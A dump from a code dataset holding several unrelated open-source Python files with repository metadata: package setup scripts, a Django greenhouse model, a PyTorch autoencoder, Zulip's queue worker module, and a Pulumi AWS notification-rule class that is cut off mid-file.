hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a01f354a894c03ca4bd63c92ec784123f40b42e
| 1,281
|
py
|
Python
|
setup.py
|
a115/python-dating
|
cb02fc54ea505fe3dcf34c0c055b55c328b5daf0
|
[
"MIT"
] | 1
|
2017-09-28T16:40:39.000Z
|
2017-09-28T16:40:39.000Z
|
setup.py
|
a115/python-dating
|
cb02fc54ea505fe3dcf34c0c055b55c328b5daf0
|
[
"MIT"
] | null | null | null |
setup.py
|
a115/python-dating
|
cb02fc54ea505fe3dcf34c0c055b55c328b5daf0
|
[
"MIT"
] | null | null | null |
import os
from codecs import open
from setuptools import setup, find_packages
from dating import VERSION
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
try:
import pypandoc
long_description = pypandoc.convert(os.path.join(here, 'README.md'), 'rst')
except (ImportError, IOError):
pass
setup(
name='dating',
version=VERSION,
description='Library for handling date ranges and time periods in a business context (based on Arrow)',
long_description=long_description,
url='https://github.com/a115/python-dating',
author='Jordan Dimov',
author_email='jdimov@mlke.net',
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
keywords='datetime date range ISO8601 arrow',
packages=['dating',],
install_requires=[
'arrow>=0.10.0',
],
python_requires='>=3'
)
| 30.5
| 111
| 0.608119
|
4a01f37932d67ce7ea8f260f5cfc3df3c94a6f4c
| 426
|
py
|
Python
|
greenhouse/web/models.py
|
wnzlff/greenhouse-web
|
b26f4c9c7c360ab1cdcb2df0b9185f31530c0215
|
[
"MIT"
] | 1
|
2021-06-28T13:26:34.000Z
|
2021-06-28T13:26:34.000Z
|
greenhouse/web/models.py
|
wnzlff/greenhouse-web
|
b26f4c9c7c360ab1cdcb2df0b9185f31530c0215
|
[
"MIT"
] | null | null | null |
greenhouse/web/models.py
|
wnzlff/greenhouse-web
|
b26f4c9c7c360ab1cdcb2df0b9185f31530c0215
|
[
"MIT"
] | null | null | null |
from django.db import models
class GreenhouseData(models.Model):
value_id = models.AutoField(primary_key=True)
timestamp = models.DateTimeField(auto_now_add=True)
light_sufficient = models.BooleanField()
ventilator_on = models.BooleanField()
humidity_inside = models.IntegerField()
temperature_inside = models.IntegerField()
humidity_outside = models.IntegerField()
temperature_outside = models.IntegerField()
| 38.727273
| 53
| 0.800469
|
4a01f39782e8e171482cbc4a49866c76b2346c36
| 1,660
|
py
|
Python
|
setup.py
|
geppi/pandaSDMX
|
33ec2704af0da5b9d1564046cd4d9707060c9bf9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
geppi/pandaSDMX
|
33ec2704af0da5b9d1564046cd4d9707060c9bf9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
geppi/pandaSDMX
|
33ec2704af0da5b9d1564046cd4d9707060c9bf9
|
[
"Apache-2.0"
] | null | null | null |
from setuptools import find_packages, setup
INSTALL_REQUIRES = [
'lxml>=3.6',
'pandas>=0.20',
'pydantic>=1.1',
'requests>=2.7',
'setuptools>19',
]
TESTS_REQUIRE = [
'pytest>=3.3',
'pytest-remotedata>=0.3.1',
'requests-mock>=1.4',
]
EXTRAS_REQUIRE = {
'cache': ['requests_cache'],
'docs': ['sphinx>=1.5', 'ipython'],
'tests': TESTS_REQUIRE,
}
setup(name='pandaSDMX',
version='1.0.0rc1.dev0',
description='A client for SDMX - Statistical Data and Metadata eXchange',
author='pandaSDMX developers',
author_email='fhaxbox66@gmail.com',
packages=find_packages(),
package_data={'pandasdmx': ['sources.json']},
url='https://github.com/dr-leo/pandasdmx',
python_requires='>=3.7',
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
tests_require=TESTS_REQUIRE,
keywords='statistics SDMX pandas data economics science',
zip_safe=True,
provides=['pandasdmx'],
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Intended Audience :: Financial and Insurance Industry',
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Topic :: Scientific/Engineering',
'Topic :: Scientific/Engineering :: Information Analysis'
]
)
| 30.740741
| 79
| 0.611446
|
4a01f5321b3800443e59f24c6e15d2c02819c77e
| 1,472
|
py
|
Python
|
net_encoder_decoder2D_plus.py
|
MuAuan/llightning-pytorch
|
38dc9ed75dd8e6f4a2a05e5a10072a549dcbf4d6
|
[
"MIT"
] | null | null | null |
net_encoder_decoder2D_plus.py
|
MuAuan/llightning-pytorch
|
38dc9ed75dd8e6f4a2a05e5a10072a549dcbf4d6
|
[
"MIT"
] | null | null | null |
net_encoder_decoder2D_plus.py
|
MuAuan/llightning-pytorch
|
38dc9ed75dd8e6f4a2a05e5a10072a549dcbf4d6
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
class Encoder(nn.Module):
def __init__(self):
super(Encoder, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(in_channels = 3, out_channels = 64,
kernel_size = 3, padding = 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.BatchNorm2d(64),
nn.Conv2d(64, 256, 3, 1, 1),
nn.ReLU(),
nn.MaxPool2d(2, 2),
nn.BatchNorm2d(256),
nn.Conv2d(256, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1)),
nn.ReLU(),
nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False),
nn.BatchNorm2d(256),
nn.Flatten()
)
def forward(self, x):
x = self.encoder(x)
return x
class Decoder(nn.Module):
def __init__(self):
super(Decoder, self).__init__()
self.decoder = nn.Sequential(
nn.ConvTranspose2d(256, 32, kernel_size=(2, 2), stride=(2, 2)),
nn.ConvTranspose2d(in_channels = 32, out_channels = 16,
kernel_size = 2, stride = 2, padding = 0),
nn.ConvTranspose2d(in_channels = 16, out_channels = 3,
kernel_size = 2, stride = 2)
)
def forward(self, x):
x = x.reshape(32,256,4,4)
x = self.decoder(x)
return x
| 35.047619
| 90
| 0.505435
|
4a01f534677b240bd0d9dc1fc6bc7ee1485aea9d
| 21,772
|
py
|
Python
|
zerver/worker/queue_processors.py
|
mahimg/zulip
|
73a5c392640c5c1f96f9c94f5f271d8e4d9251ad
|
[
"Apache-2.0"
] | null | null | null |
zerver/worker/queue_processors.py
|
mahimg/zulip
|
73a5c392640c5c1f96f9c94f5f271d8e4d9251ad
|
[
"Apache-2.0"
] | null | null | null |
zerver/worker/queue_processors.py
|
mahimg/zulip
|
73a5c392640c5c1f96f9c94f5f271d8e4d9251ad
|
[
"Apache-2.0"
] | null | null | null |
# Documented in https://zulip.readthedocs.io/en/latest/subsystems/queuing.html
from typing import Any, Callable, Dict, List, Mapping, Optional, cast
import signal
import sys
import os
from functools import wraps
import smtplib
import socket
from django.conf import settings
from django.db import connection
from django.core.handlers.wsgi import WSGIRequest
from django.core.handlers.base import BaseHandler
from zerver.models import \
get_client, get_system_bot, ScheduledEmail, PreregistrationUser, \
get_user_profile_by_id, Message, Realm, Service, UserMessage, UserProfile
from zerver.lib.context_managers import lockfile
from zerver.lib.error_notify import do_report_error
from zerver.lib.feedback import handle_feedback
from zerver.lib.queue import SimpleQueueClient, queue_json_publish, retry_event
from zerver.lib.timestamp import timestamp_to_datetime
from zerver.lib.notifications import handle_missedmessage_emails, enqueue_welcome_emails
from zerver.lib.push_notifications import handle_push_notification
from zerver.lib.actions import do_send_confirmation_email, \
do_update_user_activity, do_update_user_activity_interval, do_update_user_presence, \
internal_send_message, check_send_message, extract_recipients, \
render_incoming_message, do_update_embedded_data, do_mark_stream_messages_as_read
from zerver.lib.url_preview import preview as url_preview
from zerver.lib.digest import handle_digest_email
from zerver.lib.send_email import send_future_email, send_email_from_dict, \
FromAddress, EmailNotDeliveredException
from zerver.lib.email_mirror import process_message as mirror_email
from zerver.lib.streams import access_stream_by_id
from zerver.decorator import JsonableError
from zerver.tornado.socket import req_redis_key, respond_send_message
from confirmation.models import Confirmation, create_confirmation_link
from zerver.lib.db import reset_queries
from zerver.lib.redis_utils import get_redis_client
from zerver.lib.str_utils import force_str
from zerver.context_processors import common_context
from zerver.lib.outgoing_webhook import do_rest_call, get_outgoing_webhook_service_handler
from zerver.models import get_bot_services
from zulip import Client
from zerver.lib.bot_lib import EmbeddedBotHandler, get_bot_handler
import os
import sys
import ujson
from collections import defaultdict
import email
import time
import datetime
import logging
import requests
import ujson
from io import StringIO
import re
import importlib
class WorkerDeclarationException(Exception):
pass
def assign_queue(queue_name, enabled=True, queue_type="consumer"):
# type: (str, bool, str) -> Callable[[QueueProcessingWorker], QueueProcessingWorker]
def decorate(clazz):
# type: (QueueProcessingWorker) -> QueueProcessingWorker
clazz.queue_name = queue_name
if enabled:
register_worker(queue_name, clazz, queue_type)
return clazz
return decorate
worker_classes = {} # type: Dict[str, Any] # Any here should be QueueProcessingWorker type
queues = {} # type: Dict[str, Dict[str, QueueProcessingWorker]]
def register_worker(queue_name, clazz, queue_type):
# type: (str, QueueProcessingWorker, str) -> None
if queue_type not in queues:
queues[queue_type] = {}
queues[queue_type][queue_name] = clazz
worker_classes[queue_name] = clazz
def get_worker(queue_name):
# type: (str) -> QueueProcessingWorker
return worker_classes[queue_name]()
def get_active_worker_queues(queue_type=None):
# type: (Optional[str]) -> List[str]
"""Returns all the non-test worker queues."""
if queue_type is None:
return list(worker_classes.keys())
return list(queues[queue_type].keys())
def check_and_send_restart_signal():
# type: () -> None
try:
if not connection.is_usable():
logging.warning("*** Sending self SIGUSR1 to trigger a restart.")
os.kill(os.getpid(), signal.SIGUSR1)
except Exception:
pass
def retry_send_email_failures(func):
# type: (Callable[[Any, Dict[str, Any]], None]) -> Callable[[QueueProcessingWorker, Dict[str, Any]], None]
# If we don't use cast() and use QueueProcessingWorker instead of Any in
# function type annotation then mypy complains.
func = cast(Callable[[QueueProcessingWorker, Dict[str, Any]], None], func)
@wraps(func)
def wrapper(worker, data):
# type: (QueueProcessingWorker, Dict[str, Any]) -> None
try:
func(worker, data)
except (smtplib.SMTPServerDisconnected, socket.gaierror):
def on_failure(event):
# type: (Dict[str, Any]) -> None
logging.exception("Event {} failed".format(event['id']))
retry_event(worker.queue_name, data, on_failure)
return wrapper
class QueueProcessingWorker:
queue_name = None # type: str
def __init__(self):
# type: () -> None
self.q = None # type: SimpleQueueClient
if self.queue_name is None:
raise WorkerDeclarationException("Queue worker declared without queue_name")
def consume(self, data):
# type: (Dict[str, Any]) -> None
raise WorkerDeclarationException("No consumer defined!")
def consume_wrapper(self, data):
# type: (Dict[str, Any]) -> None
try:
self.consume(data)
except Exception:
self._log_problem()
if not os.path.exists(settings.QUEUE_ERROR_DIR):
os.mkdir(settings.QUEUE_ERROR_DIR) # nocoverage
fname = '%s.errors' % (self.queue_name,)
fn = os.path.join(settings.QUEUE_ERROR_DIR, fname)
line = u'%s\t%s\n' % (time.asctime(), ujson.dumps(data))
lock_fn = fn + '.lock'
with lockfile(lock_fn):
with open(fn, 'ab') as f:
f.write(line.encode('utf-8'))
check_and_send_restart_signal()
finally:
reset_queries()
def _log_problem(self):
# type: () -> None
logging.exception("Problem handling data on queue %s" % (self.queue_name,))
def setup(self):
# type: () -> None
self.q = SimpleQueueClient()
def start(self):
# type: () -> None
self.q.register_json_consumer(self.queue_name, self.consume_wrapper)
self.q.start_consuming()
def stop(self):
# type: () -> None
self.q.stop_consuming()
class LoopQueueProcessingWorker(QueueProcessingWorker):
sleep_delay = 0
def start(self) -> None: # nocoverage
while True:
# TODO: Probably it'd be better to share code with consume_wrapper()
events = self.q.drain_queue(self.queue_name, json=True)
try:
self.consume_batch(events)
finally:
reset_queries()
time.sleep(self.sleep_delay)
def consume_batch(self, event: List[Dict[str, Any]]) -> None:
raise NotImplementedError
def consume(self, event: Dict[str, Any]) -> None:
"""In LoopQueueProcessingWorker, consume is used just for automated tests"""
self.consume_batch([event])
@assign_queue('signups')
class SignupWorker(QueueProcessingWorker):
def consume(self, data):
# type: (Dict[str, Any]) -> None
user_profile = get_user_profile_by_id(data['user_id'])
logging.info("Processing signup for user %s in realm %s" % (
user_profile.email, user_profile.realm.string_id))
if settings.MAILCHIMP_API_KEY and settings.PRODUCTION:
endpoint = "https://%s.api.mailchimp.com/3.0/lists/%s/members" % \
(settings.MAILCHIMP_API_KEY.split('-')[1], settings.ZULIP_FRIENDS_LIST_ID)
params = dict(data)
del params['user_id']
params['list_id'] = settings.ZULIP_FRIENDS_LIST_ID
params['status'] = 'subscribed'
r = requests.post(endpoint, auth=('apikey', settings.MAILCHIMP_API_KEY), json=params, timeout=10)
if r.status_code == 400 and ujson.loads(r.text)['title'] == 'Member Exists':
logging.warning("Attempted to sign up already existing email to list: %s" %
(data['email_address'],))
elif r.status_code == 400:
retry_event('signups', data, lambda e: r.raise_for_status())
else:
r.raise_for_status()
@assign_queue('invites')
class ConfirmationEmailWorker(QueueProcessingWorker):
def consume(self, data):
# type: (Mapping[str, Any]) -> None
if "email" in data:
# When upgrading from a version up through 1.7.1, there may be
# existing items in the queue with `email` instead of `prereg_id`.
invitee = PreregistrationUser.objects.filter(
email__iexact=data["email"].strip()).latest("invited_at")
else:
invitee = PreregistrationUser.objects.filter(id=data["prereg_id"]).first()
if invitee is None:
# The invitation could have been revoked
return
referrer = get_user_profile_by_id(data["referrer_id"])
logging.info("Sending invitation for realm %s to %s" % (referrer.realm.string_id, invitee.email))
do_send_confirmation_email(invitee, referrer)
# queue invitation reminder for two days from now.
link = create_confirmation_link(invitee, referrer.realm.host, Confirmation.INVITATION)
context = common_context(referrer)
context.update({
'activate_url': link,
'referrer_name': referrer.full_name,
'referrer_email': referrer.email,
'referrer_realm_name': referrer.realm.name,
})
send_future_email(
"zerver/emails/invitation_reminder",
to_email=invitee.email,
from_address=FromAddress.NOREPLY,
context=context,
delay=datetime.timedelta(days=2))
@assign_queue('user_activity')
class UserActivityWorker(QueueProcessingWorker):
def consume(self, event):
# type: (Mapping[str, Any]) -> None
user_profile = get_user_profile_by_id(event["user_profile_id"])
client = get_client(event["client"])
log_time = timestamp_to_datetime(event["time"])
query = event["query"]
do_update_user_activity(user_profile, client, query, log_time)
@assign_queue('user_activity_interval')
class UserActivityIntervalWorker(QueueProcessingWorker):
def consume(self, event):
# type: (Mapping[str, Any]) -> None
user_profile = get_user_profile_by_id(event["user_profile_id"])
log_time = timestamp_to_datetime(event["time"])
do_update_user_activity_interval(user_profile, log_time)
@assign_queue('user_presence')
class UserPresenceWorker(QueueProcessingWorker):
def consume(self, event):
# type: (Mapping[str, Any]) -> None
logging.debug("Received presence event: %s" % (event),)
user_profile = get_user_profile_by_id(event["user_profile_id"])
client = get_client(event["client"])
log_time = timestamp_to_datetime(event["time"])
status = event["status"]
do_update_user_presence(user_profile, client, log_time, status)
@assign_queue('missedmessage_emails', queue_type="loop")
class MissedMessageWorker(LoopQueueProcessingWorker):
# Aggregate all messages received every 2 minutes to let someone finish sending a batch
# of messages
sleep_delay = 2 * 60
def consume_batch(self, missed_events: List[Dict[str, Any]]) -> None:
by_recipient = defaultdict(list) # type: Dict[int, List[Dict[str, Any]]]
for event in missed_events:
logging.debug("Received missedmessage_emails event: %s" % (event,))
by_recipient[event['user_profile_id']].append(event)
for user_profile_id, events in by_recipient.items():
handle_missedmessage_emails(user_profile_id, events)
@assign_queue('missedmessage_email_senders')
class MissedMessageSendingWorker(QueueProcessingWorker):
@retry_send_email_failures
def consume(self, data):
# type: (Dict[str, Any]) -> None
try:
send_email_from_dict(data)
except EmailNotDeliveredException:
# TODO: Do something smarter here ..
pass
@assign_queue('missedmessage_mobile_notifications')
class PushNotificationsWorker(QueueProcessingWorker):
def consume(self, data):
# type: (Mapping[str, Any]) -> None
handle_push_notification(data['user_profile_id'], data)
# We probably could stop running this queue worker at all if ENABLE_FEEDBACK is False
@assign_queue('feedback_messages')
class FeedbackBot(QueueProcessingWorker):
def consume(self, event):
# type: (Mapping[str, Any]) -> None
logging.info("Received feedback from %s" % (event["sender_email"],))
handle_feedback(event)
@assign_queue('error_reports')
class ErrorReporter(QueueProcessingWorker):
def consume(self, event):
# type: (Mapping[str, Any]) -> None
logging.info("Processing traceback with type %s for %s" % (event['type'], event.get('user_email')))
if settings.ERROR_REPORTING:
do_report_error(event['report']['host'], event['type'], event['report'])
@assign_queue('slow_queries', queue_type="loop")
class SlowQueryWorker(LoopQueueProcessingWorker):
# Sleep 1 minute between checking the queue
sleep_delay = 60 * 1
def consume_batch(self, slow_queries):
# type: (List[Dict[str, Any]]) -> None
for query in slow_queries:
logging.info("Slow query: %s" % (query))
if settings.ERROR_BOT is None:
return
if len(slow_queries) > 0:
topic = "%s: slow queries" % (settings.EXTERNAL_HOST,)
content = ""
for query in slow_queries:
content += " %s\n" % (query,)
error_bot_realm = get_system_bot(settings.ERROR_BOT).realm
internal_send_message(error_bot_realm, settings.ERROR_BOT,
"stream", "logs", topic, content)
@assign_queue("message_sender")
class MessageSenderWorker(QueueProcessingWorker):
def __init__(self):
# type: () -> None
super().__init__()
self.redis_client = get_redis_client()
self.handler = BaseHandler()
self.handler.load_middleware()
def consume(self, event):
# type: (Mapping[str, Any]) -> None
server_meta = event['server_meta']
environ = {
'REQUEST_METHOD': 'SOCKET',
'SCRIPT_NAME': '',
'PATH_INFO': '/json/messages',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': 9993,
'SERVER_PROTOCOL': 'ZULIP_SOCKET/1.0',
'wsgi.version': (1, 0),
'wsgi.input': StringIO(),
'wsgi.errors': sys.stderr,
'wsgi.multithread': False,
'wsgi.multiprocess': True,
'wsgi.run_once': False,
'zulip.emulated_method': 'POST'
}
if 'socket_user_agent' in event['request']:
environ['HTTP_USER_AGENT'] = event['request']['socket_user_agent']
del event['request']['socket_user_agent']
# We're mostly using a WSGIRequest for convenience
environ.update(server_meta['request_environ'])
request = WSGIRequest(environ)
# Note: If we ever support non-POST methods, we'll need to change this.
request._post = event['request']
request.csrf_processing_done = True
user_profile = get_user_profile_by_id(server_meta['user_id'])
request._cached_user = user_profile
resp = self.handler.get_response(request)
server_meta['time_request_finished'] = time.time()
server_meta['worker_log_data'] = request._log_data
resp_content = resp.content.decode('utf-8')
response_data = ujson.loads(resp_content)
if response_data['result'] == 'error':
check_and_send_restart_signal()
result = {'response': response_data, 'req_id': event['req_id'],
'server_meta': server_meta}
redis_key = req_redis_key(event['req_id'])
self.redis_client.hmset(redis_key, {'status': 'complete',
'response': resp_content})
queue_json_publish(server_meta['return_queue'], result,
respond_send_message)
@assign_queue('digest_emails')
class DigestWorker(QueueProcessingWorker):
# Who gets a digest is entirely determined by the enqueue_digest_emails
# management command, not here.
def consume(self, event):
# type: (Mapping[str, Any]) -> None
logging.info("Received digest event: %s" % (event,))
handle_digest_email(event["user_profile_id"], event["cutoff"])
@assign_queue('email_mirror')
class MirrorWorker(QueueProcessingWorker):
# who gets a digest is entirely determined by the enqueue_digest_emails
# management command, not here.
def consume(self, event):
# type: (Mapping[str, Any]) -> None
message = force_str(event["message"])
mirror_email(email.message_from_string(message),
rcpt_to=event["rcpt_to"], pre_checked=True)
@assign_queue('test', queue_type="test")
class TestWorker(QueueProcessingWorker):
# This worker allows you to test the queue worker infrastructure without
# creating significant side effects. It can be useful in development or
# for troubleshooting prod/staging. It pulls a message off the test queue
# and appends it to a file in /tmp.
def consume(self, event): # nocoverage
# type: (Mapping[str, Any]) -> None
fn = settings.ZULIP_WORKER_TEST_FILE
message = ujson.dumps(event)
logging.info("TestWorker should append this message to %s: %s" % (fn, message))
with open(fn, 'a') as f:
f.write(message + '\n')
@assign_queue('embed_links')
class FetchLinksEmbedData(QueueProcessingWorker):
def consume(self, event):
# type: (Mapping[str, Any]) -> None
for url in event['urls']:
url_preview.get_link_embed_data(url)
message = Message.objects.get(id=event['message_id'])
# If the message changed, we will run this task after updating the message
# in zerver.views.messages.update_message_backend
if message.content != event['message_content']:
return
if message.content is not None:
query = UserMessage.objects.filter(
message=message.id
)
message_user_ids = set(query.values_list('user_profile_id', flat=True))
# Fetch the realm whose settings we're using for rendering
realm = Realm.objects.get(id=event['message_realm_id'])
# If rendering fails, the called code will raise a JsonableError.
rendered_content = render_incoming_message(
message,
message.content,
message_user_ids,
realm)
do_update_embedded_data(
message.sender, message, message.content, rendered_content)
@assign_queue('outgoing_webhooks')
class OutgoingWebhookWorker(QueueProcessingWorker):
def consume(self, event):
# type: (Mapping[str, Any]) -> None
message = event['message']
dup_event = cast(Dict[str, Any], event)
dup_event['command'] = message['content']
services = get_bot_services(event['user_profile_id'])
for service in services:
dup_event['service_name'] = str(service.name)
service_handler = get_outgoing_webhook_service_handler(service)
rest_operation, request_data = service_handler.process_event(dup_event)
do_rest_call(rest_operation, request_data, dup_event, service_handler)
@assign_queue('embedded_bots')
class EmbeddedBotWorker(QueueProcessingWorker):
def get_bot_api_client(self, user_profile):
# type: (UserProfile) -> EmbeddedBotHandler
return EmbeddedBotHandler(user_profile)
def consume(self, event):
# type: (Mapping[str, Any]) -> None
user_profile_id = event['user_profile_id']
user_profile = get_user_profile_by_id(user_profile_id)
message = cast(Dict[str, Any], event['message'])
# TODO: Do we actually want to allow multiple Services per bot user?
services = get_bot_services(user_profile_id)
for service in services:
bot_handler = get_bot_handler(str(service.name))
if bot_handler is None:
logging.error("Error: User %s has bot with invalid embedded bot service %s" % (
user_profile_id, service.name))
continue
bot_handler.handle_message(
message=message,
bot_handler=self.get_bot_api_client(user_profile)
)
@assign_queue('deferred_work')
class DeferredWorker(QueueProcessingWorker):
def consume(self, event: Mapping[str, Any]) -> None:
if event['type'] == 'mark_stream_messages_as_read':
user_profile = get_user_profile_by_id(event['user_profile_id'])
for stream_id in event['stream_ids']:
# Since the user just unsubscribed, we don't require
# an active Subscription object (otherwise, private
# streams would never be accessible)
(stream, recipient, sub) = access_stream_by_id(user_profile, stream_id,
require_active=False)
do_mark_stream_messages_as_read(user_profile, stream)
| 40.619403
| 110
| 0.661446
|
4a01f55ab0dbfdc34ed53ff0076d467845459af1
| 1,421
|
py
|
Python
|
collector/gather.py
|
sweeneyngo/swvgio
|
56a3f8413a253e08703eb11857aadac88f98ff87
|
[
"MIT"
] | null | null | null |
collector/gather.py
|
sweeneyngo/swvgio
|
56a3f8413a253e08703eb11857aadac88f98ff87
|
[
"MIT"
] | 2
|
2021-07-21T14:33:00.000Z
|
2021-07-21T14:34:55.000Z
|
collector/gather.py
|
sweeneyngo/swvgio
|
56a3f8413a253e08703eb11857aadac88f98ff87
|
[
"MIT"
] | null | null | null |
from bs4 import BeautifulSoup, SoupStrainer
import httplib2
class Voca:
def __init__(self, link, title, artist):
self.link = link
self.title = title
self.artist = artist
"""
@return [
[Voca(link, title, artist), ... ],
[Voca(link, title, artist), ... ],
]
@extra {len(return) = 2}
"""
def parseVG():
# http client
http = httplib2.Http()
try:
status, response = http.request("https://vgperson.com/vocalhighlights.php?m=2021-06")
# status, response = http.request(getSearchQuery())
except httplib2.ServerNotFoundError:
print("Couldn't fetch resource.")
return None, None
playlists = []
for index, table in enumerate(BeautifulSoup(response, features="html.parser", parse_only=SoupStrainer("table"))):
playlists.append([])
videos = table.find_all("td")
# no entries/uneven entries
if len(videos) <= 0 or len(videos) % 2 != 0:
return None, None
for i in range(0, len(videos), 2):
entry = videos[i].contents or []
link = entry[0]["href"] or []
title = entry[0].contents or []
artist = videos[i + 1].contents or []
if not (entry and title and artist and link):
return None, None
playlists[index].append(Voca(link, title, artist))
return playlists
| 23.683333
| 117
| 0.570725
|
4a01f6764f9afca4758d07b862e9e02509dfe70e
| 9,183
|
py
|
Python
|
sdk/python/pulumi_aws/codestarnotifications/notification_rule.py
|
michael-golden/pulumi-aws
|
165e876e166ecab1870e857822247585d78aef64
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/codestarnotifications/notification_rule.py
|
michael-golden/pulumi-aws
|
165e876e166ecab1870e857822247585d78aef64
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/codestarnotifications/notification_rule.py
|
michael-golden/pulumi-aws
|
165e876e166ecab1870e857822247585d78aef64
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class NotificationRule(pulumi.CustomResource):
arn: pulumi.Output[str]
"""
The codestar notification rule ARN.
"""
detail_type: pulumi.Output[str]
"""
The level of detail to include in the notifications for this resource. Possible values are `BASIC` and `FULL`.
"""
event_type_ids: pulumi.Output[list]
"""
A list of event types associated with this notification rule.
For list of allowed events see [here](https://docs.aws.amazon.com/codestar-notifications/latest/userguide/concepts.html#concepts-api).
"""
name: pulumi.Output[str]
"""
The name of notification rule.
"""
resource: pulumi.Output[str]
"""
The ARN of the resource to associate with the notification rule.
"""
status: pulumi.Output[str]
"""
The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
"""
tags: pulumi.Output[dict]
"""
A map of tags to assign to the resource.
"""
targets: pulumi.Output[list]
"""
Configuration blocks containing notification target information. Can be specified multiple times. At least one target must be specified on creation.
* `address` (`str`) - The ARN of notification rule target. For example, a SNS Topic ARN.
* `status` (`str`) - The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
* `type` (`str`) - The type of the notification target. Default value is `SNS`.
"""
def __init__(__self__, resource_name, opts=None, detail_type=None, event_type_ids=None, name=None, resource=None, status=None, tags=None, targets=None, __props__=None, __name__=None, __opts__=None):
"""
Provides a CodeStar Notifications Rule.
## Example Usage
```python
import pulumi
import pulumi_aws as aws
code = aws.codecommit.Repository("code", repository_name="example-code-repo")
notif = aws.sns.Topic("notif")
notif_access = notif.arn.apply(lambda arn: aws.iam.get_policy_document(statements=[{
"actions": ["sns:Publish"],
"principals": [{
"type": "Service",
"identifiers": ["codestar-notifications.amazonaws.com"],
}],
"resources": [arn],
}]))
default = aws.sns.TopicPolicy("default",
arn=notif.arn,
policy=notif_access.json)
commits = aws.codestarnotifications.NotificationRule("commits",
detail_type="BASIC",
event_type_ids=["codecommit-repository-comments-on-commits"],
resource=code.arn,
targets=[{
"address": notif.arn,
}])
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] detail_type: The level of detail to include in the notifications for this resource. Possible values are `BASIC` and `FULL`.
:param pulumi.Input[list] event_type_ids: A list of event types associated with this notification rule.
For list of allowed events see [here](https://docs.aws.amazon.com/codestar-notifications/latest/userguide/concepts.html#concepts-api).
:param pulumi.Input[str] name: The name of notification rule.
:param pulumi.Input[str] resource: The ARN of the resource to associate with the notification rule.
:param pulumi.Input[str] status: The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
:param pulumi.Input[dict] tags: A map of tags to assign to the resource.
:param pulumi.Input[list] targets: Configuration blocks containing notification target information. Can be specified multiple times. At least one target must be specified on creation.
The **targets** object supports the following:
* `address` (`pulumi.Input[str]`) - The ARN of notification rule target. For example, a SNS Topic ARN.
* `status` (`pulumi.Input[str]`) - The status of the notification rule. Possible values are `ENABLED` and `DISABLED`, default is `ENABLED`.
* `type` (`pulumi.Input[str]`) - The type of the notification target. Default value is `SNS`.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if detail_type is None:
raise TypeError("Missing required property 'detail_type'")
__props__['detail_type'] = detail_type
if event_type_ids is None:
raise TypeError("Missing required property 'event_type_ids'")
__props__['event_type_ids'] = event_type_ids
__props__['name'] = name
if resource is None:
